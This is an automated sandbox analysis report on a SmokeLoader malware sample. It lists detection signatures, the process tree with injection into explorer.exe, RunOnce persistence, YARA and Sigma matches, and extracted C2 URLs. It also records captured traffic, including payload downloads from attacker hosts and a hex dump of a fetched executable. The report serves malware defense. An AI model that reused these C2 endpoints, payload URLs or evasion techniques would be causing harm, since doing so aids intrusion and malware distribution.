Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1478859
MD5:d76c718ada43477786ef9ca3bba29842
SHA1:c64677ddce626f7b343ee2aee0deb369dd21e0df
SHA256:efa03ac97d2bf5c0020ae8d90cd2977beccca38fe5394d77a4a5482a8190e4ee
Tags:exeSmokeLoader
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Check for Windows Defender sandbox
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes memory attributes in foreign processes to executable or writable
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5672 cmdline: "C:\Users\user\Desktop\file.exe" MD5: D76C718ADA43477786EF9CA3BBA29842)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • C9F5.exe (PID: 1960 cmdline: C:\Users\user\AppData\Local\Temp\C9F5.exe MD5: 2B3ECC21382E825D6FE0812A717717EB)
        • conhost.exe (PID: 6020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • C9F5.exe (PID: 616 cmdline: "C:\Users\user\AppData\Local\Temp\C9F5.exe" MD5: 2B3ECC21382E825D6FE0812A717717EB)
        • conhost.exe (PID: 348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • C9F5.exe (PID: 3372 cmdline: "C:\Users\user\AppData\Local\Temp\C9F5.exe" MD5: 2B3ECC21382E825D6FE0812A717717EB)
        • conhost.exe (PID: 4444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • ajjwvsd (PID: 4524 cmdline: C:\Users\user\AppData\Roaming\ajjwvsd MD5: D76C718ADA43477786EF9CA3BBA29842)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://evilos.cc/tmp/index.php", "http://gebeus.ru/tmp/index.php", "http://office-techs.biz/tmp/index.php", "http://cx5519.com/tmp/index.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2121442892.0000000000846000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x3a61:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000004.00000002.2409729283.00000000021B1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x634:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      Click to see the 7 entries

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: New RUN Key Pointing to Suspicious Folder
      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\C9F5.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 1028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#1757_8yUscnjrUY
      Sigma detected: CurrentVersion Autorun Keys Modification
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\C9F5.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 1028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update#1757_8yUscnjrUY
      Sigma detected: Execution of Suspicious File Type Extension
      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\ajjwvsd, CommandLine: C:\Users\user\AppData\Roaming\ajjwvsd, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\ajjwvsd, NewProcessName: C:\Users\user\AppData\Roaming\ajjwvsd, OriginalFileName: C:\Users\user\AppData\Roaming\ajjwvsd, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\ajjwvsd, ProcessId: 4524, ProcessName: ajjwvsd

      Snort Signatures

      No Snort rule has matched

      Suricata Signatures

      Timestamp:2024-07-23T06:16:16.946127+0200
      SID:2019714
      Source Port:49727
      Destination Port:80
      Protocol:TCP
      Classtype:Potentially Bad Traffic

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: https://mussangroup.com/wp-content/images/pic1.jpgAvira URL Cloud: Label: malware
      Source: http://cx5519.com/tmp/index.phpAvira URL Cloud: Label: malware
      Source: http://gebeus.ru/tmp/index.phpAvira URL Cloud: Label: malware
      Source: http://office-techs.biz/tmp/index.phpAvira URL Cloud: Label: malware
      Source: http://evilos.cc/tmp/index.phpAvira URL Cloud: Label: malware
      Found malware configuration
      Source: 00000000.00000002.2121068064.00000000005C0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://evilos.cc/tmp/index.php", "http://gebeus.ru/tmp/index.php", "http://office-techs.biz/tmp/index.php", "http://cx5519.com/tmp/index.php"]}
      Multi AV Scanner detection for domain / URL
      Source: gebeus.ruVirustotal: Detection: 17%Perma Link
      Source: evilos.ccVirustotal: Detection: 18%Perma Link
      Source: mussangroup.comVirustotal: Detection: 13%Perma Link
      Source: http://cx5519.com/tmp/index.phpVirustotal: Detection: 11%Perma Link
      Source: http://gebeus.ru/tmp/index.phpVirustotal: Detection: 18%Perma Link
      Source: https://mussangroup.com/wp-content/images/pic1.jpgVirustotal: Detection: 6%Perma Link
      Source: http://office-techs.biz/tmp/index.phpVirustotal: Detection: 13%Perma Link
      Source: http://evilos.cc/tmp/index.phpVirustotal: Detection: 17%Perma Link
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Roaming\ajjwvsdReversingLabs: Detection: 39%
      Source: C:\Users\user\AppData\Roaming\ajjwvsdVirustotal: Detection: 41%Perma Link
      Multi AV Scanner detection for submitted file
      Source: file.exeReversingLabs: Detection: 39%
      Source: file.exeVirustotal: Detection: 41%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Machine Learning detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\C9F5.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Roaming\ajjwvsdJoe Sandbox ML: detected
      Machine Learning detection for sample
      Source: file.exeJoe Sandbox ML: detected
      Source: C9F5.exe, 00000007.00000003.2902891158.000001C714941000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_437d2e4c-c
      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: unknownHTTPS traffic detected: 185.149.100.242:443 -> 192.168.2.5:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49732 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49736 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49738 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49742 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49743 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49744 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49745 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49746 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49747 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49748 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49761 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49762 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 167.235.128.153:443 -> 192.168.2.5:49764 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.137:443 -> 192.168.2.5:49765 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 107.173.160.139:443 -> 192.168.2.5:49766 version: TLS 1.2

      Networking

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 211.202.224.10 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 77.221.157.163 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 107.173.160.139 443Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 107.173.160.137 443Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 64.190.113.113 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 127.0.0.127 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 167.235.128.153 443Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.149.100.242 443Jump to behavior
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractorURLs: http://evilos.cc/tmp/index.php
      Source: Malware configuration extractorURLs: http://gebeus.ru/tmp/index.php
      Source: Malware configuration extractorURLs: http://office-techs.biz/tmp/index.php
      Source: Malware configuration extractorURLs: http://cx5519.com/tmp/index.php
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Jul 2024 04:16:16 GMTServer: ApacheLast-Modified: Mon, 22 Jul 2024 19:29:34 GMTETag: "f1600-61ddb109e6b16"Accept-Ranges: bytesContent-Length: 988672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 05 00 6c 5a 41 03 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 00 00 00 c0 08 00 00 5c 06 00 00 00 00 00 c0 5a 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 0f 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 78 10 0f 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0f 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 c0 08 00 00 10 00 00 00 c0 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 50 06 00 00 d0 08 00 00 4c 06 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 30 00 00 00 20 0f 00 00 02 00 00 00 10 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 00 10 00 00 00 50 0f 00 00 02 00 00 00 12 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 00 00 00 00 60 0f 00 00 02 00 00 00 14 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: Joe Sandbox ViewIP Address: 77.221.157.163 77.221.157.163
      Source: Joe Sandbox ViewIP Address: 107.173.160.139 107.173.160.139
      Source: Joe Sandbox ViewIP Address: 107.173.160.137 107.173.160.137
      Source: Joe Sandbox ViewASN Name: SKB-ASSKBroadbandCoLtdKR SKB-ASSKBroadbandCoLtdKR
      Source: Joe Sandbox ViewASN Name: INFOBOX-ASInfoboxruAutonomousSystemRU INFOBOX-ASInfoboxruAutonomousSystemRU
      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
      Source: Joe Sandbox ViewASN Name: POWERVIS-AS-KRLGPOWERCOMMKR POWERVIS-AS-KRLGPOWERCOMMKR
      Source: Joe Sandbox ViewJA3 fingerprint: a6c95ef2da5b759f65c60665167952ee
      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: global trafficHTTP traffic detected: GET /wp-content/images/pic1.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: mussangroup.com
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 8931
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 155043
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1288
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://psrjxmmdjkgukbst.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nwahwjhjnhccg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xnykmijsuyh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://orusljfrmtwk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gpbmggcpxwmve.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rgmwogluhxcw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bnbjwqelfrqfgfg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ljcfhqrurbdrtnbx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: gebeus.ru
      Source: global trafficHTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gxlpbwlusmnje.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ujiloutaffhspsf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yfbmduchuitdam.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jrnqiqvfjjkw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: gebeus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vlrfckdhdpbbw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: gebeus.ru
